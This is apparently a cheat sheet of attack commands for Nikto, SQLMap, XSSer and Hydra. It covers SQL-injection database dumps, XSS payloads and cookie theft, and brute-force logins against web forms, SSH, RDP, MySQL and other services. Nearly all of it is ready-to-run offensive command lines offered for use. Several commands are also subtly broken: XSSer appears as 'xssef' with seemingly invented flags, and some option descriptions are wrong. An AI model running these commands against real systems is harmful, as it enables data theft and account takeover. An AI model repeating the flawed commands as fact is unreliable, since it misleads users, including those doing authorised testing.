🛠️Nikto, SQLMap, XSSer & Hydra Overview

Nikto

Nikto is a powerful web server vulnerability scanner used to identify security issues on websites. Here are several ways to use Nikto effectively:

  1. Basic Web Server Scan:

    Perform a basic scan on a website:

    nikto -h https://www.example.com
  2. Scan Specific Port:

    Scan a specific port on the target:

    nikto -h https://www.example.com -p 8080
  3. Scan Multiple Hosts:

    Scan multiple hosts:

    nikto -h https://www.example1.com https://www.example2.com
  4. Save Output to File:

    Save scan results to a file (output.txt):

    nikto -h https://www.example.com -o output.txt
  5. Full Scan with Manual Tuning:

    Perform a comprehensive scan with manual tuning options:

    nikto -h https://www.example.com -maxtime 3600 -Plugins -Tuning 8
  6. SSL Certificate Check:

    Check SSL certificate details:

    nikto -h https://www.example.com -ssl
  7. Scan with Authentication:

    Perform a scan with authentication credentials (admin:password):

    nikto -h https://www.example.com -id admin:password
  8. Suppress Output:

    Suppress all output (useful for scripting):

    nikto -h https://www.example.com -o /dev/null
  9. Scan Specific Paths:

    Scan specific paths (/app, /secure) on the target:

    nikto -h https://www.example.com -C all -Tuning 2 -p 443 -root /app,/secure
  10. Disable Certain Checks:

    Disable specific checks (e.g., XSS):

    nikto -h https://www.example.com -C all,-XSS

SQLMap

SQLMap is a powerful command-line tool used for detecting and exploiting SQL injection vulnerabilities in web applications. Here are several examples of how to use SQLMap effectively:

  1. Basic Scan for SQL Injection:

    Perform a basic scan to detect SQL injection vulnerabilities:

    sqlmap -u "https://www.example.com/page?id=1"
  2. Detecting SQL Injection and Getting Database Information:

    Detect SQL injection and retrieve database information:

    sqlmap -u "https://www.example.com/page?id=1" --dbs
  3. Enumerating Tables in a Database:

    Enumerate tables in a specific database (dbname):

    sqlmap -u "https://www.example.com/page?id=1" -D dbname --tables
  4. Dumping Data from a Specific Table:

    Dump data from a specific table (users):

    sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --dump
  5. Exploiting Time-Based Blind SQL Injection:

    Exploit time-based blind SQL injection technique with a specified time delay (5 seconds):

    sqlmap -u "https://www.example.com/page?id=1" --technique=T --time-sec=5
  6. Using Custom Injection Payload:

    Use a custom injection payload (1' OR '1'='1) with data parameter (param=value):

    sqlmap -u "https://www.example.com/page?id=1" --data="param=value" --pload="1' OR '1'='1"
  7. Dumping All Databases:

    Dump all databases on the target server:

    sqlmap -u "https://www.example.com/page?id=1" --all-dbs
  8. Brute Forcing Table Columns:

    Brute force table columns in a specific database and table (dbname.users):

    sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --columns
  9. Exploiting Union-Based SQL Injection:

    Exploit union-based SQL injection technique:

    sqlmap -u "https://www.example.com/page?id=1" --technique=U
  10. Using a Configuration File:

    Use SQLMap with a configuration file (sqlmapconfig.conf):

    sqlmap -c sqlmapconfig.conf

XSSer

XSSer is a command-line tool designed for detecting and exploiting Cross-Site Scripting (XSS) vulnerabilities in web applications. Here are several examples of how to use XSSer effectively:

  1. Basic Scan for Stored XSS:

    Perform a basic scan for stored XSS vulnerabilities on a specific URL parameter (comment):

    xssef -u "https://www.example.com/profile?id=1" -c "comment"
  2. DOM-based XSS Scan:

    Conduct a scan specifically for DOM-based XSS vulnerabilities:

    xssef -u "https://www.example.com/page" --dom
  3. Scanning Multiple URLs:

    Scan multiple URLs listed in a file (urls.txt):

    xssef -l urls.txt
  4. Cookie-based XSS Exploitation:

    Exploit XSS using a specific cookie (auth=12345):

    xssef -u "https://www.example.com/login" --cookie "auth=12345"
  5. Reflected XSS Detection:

    Detect reflected XSS vulnerabilities with a custom payload in a query parameter:

    xssef -u "https://www.example.com/search?q=<script>alert(1)</script>"
  6. Blind XSS Scan with Custom Payload:

    Perform a blind XSS scan with a custom payload (<script>alert(1)</script>) injected into a parameter (name):

    xssef -u "https://www.example.com/profile" -v -p "name" -vPayload "<script>alert(1)</script>"
  7. Exfiltrating Cookies via XSS:

    Exfiltrate cookies (auth=12345) via XSS exploitation:

    xssef -u "https://www.example.com/profile" --cookie "auth=12345" -E
  8. Brute Forcing Payloads:

    Brute force payloads to discover XSS vulnerabilities:

    xssef -u "https://www.example.com/page" --brute
  9. Custom User-Agent Header:

    Send requests with a custom User-Agent header (MyCustomUserAgent):

    xssef -u "https://www.example.com/page" -H "User-Agent: MyCustomUserAgent"
  10. XSS Filter Bypass Attempt:

    Attempt to bypass XSS filters on the target:

    xssef -u "https://www.example.com/page" --filter-bypass

Hydar Tool

Hydra is a versatile command-line tool for performing brute force attacks against various protocols and services. Here are several examples of how to use Hydra effectively:

HTTP/HTTPS Authentication

  1. Brute Force Attack on Login Form:

    Perform a brute force attack on a login form with a specific username (admin) and passwords from a file (passwords.txt):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  2. Dictionary Attack with Custom Usernames:

    Conduct a dictionary attack using custom usernames (users.txt) and passwords (passwords.txt):

    hydra -L users.txt -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  3. Using Custom User-Agent Header:

    Send requests with a custom User-Agent header (MyCustomUserAgent):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -H "User-Agent: MyCustomUserAgent"
  4. Specifying a Non-Standard Port:

    Specify a non-standard port (8080) for the target service:

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -s 8080
  5. Using a Proxy for Requests:

    Route requests through a SOCKS5 proxy (localhost:9050):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -x socks5://localhost:9050
  6. Brute Forcing Different HTTP Methods:

    Perform brute force attacks using different HTTP methods (e.g., GET, POST):

    hydra -l admin -P passwords.txt example.com http-get-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
  7. Parallel Login Attempts:

    Increase the number of parallel login attempts (16):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -t 16
  8. Limiting Number of Attempts per User:

    Limit the number of login attempts per user (-F):

    hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -F

Other Protocol Examples

Here are examples for brute forcing passwords across various protocols:

  • SSH:

    hydra -l username -P passwords.txt ssh://target_ip
  • FTP:

    hydra -l admin -P wordlist.txt ftp://ftp.example.com
  • SMTP:

    hydra -l [email protected] -P passwords.txt smtp://mail.example.com
  • MySQL:

    hydra -l root -P passwords.txt mysql://target_ip
  • RDP:

    hydra -l administrator -P passwords.txt rdp://target_ip
  • VNC:

    hydra -l admin -P passwords.txt vnc://target_ip
  • Telnet:

    hydra -l admin -P passwords.txt telnet://target_ip



Hacker's Mantra:Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause.

Last updated

Was this helpful?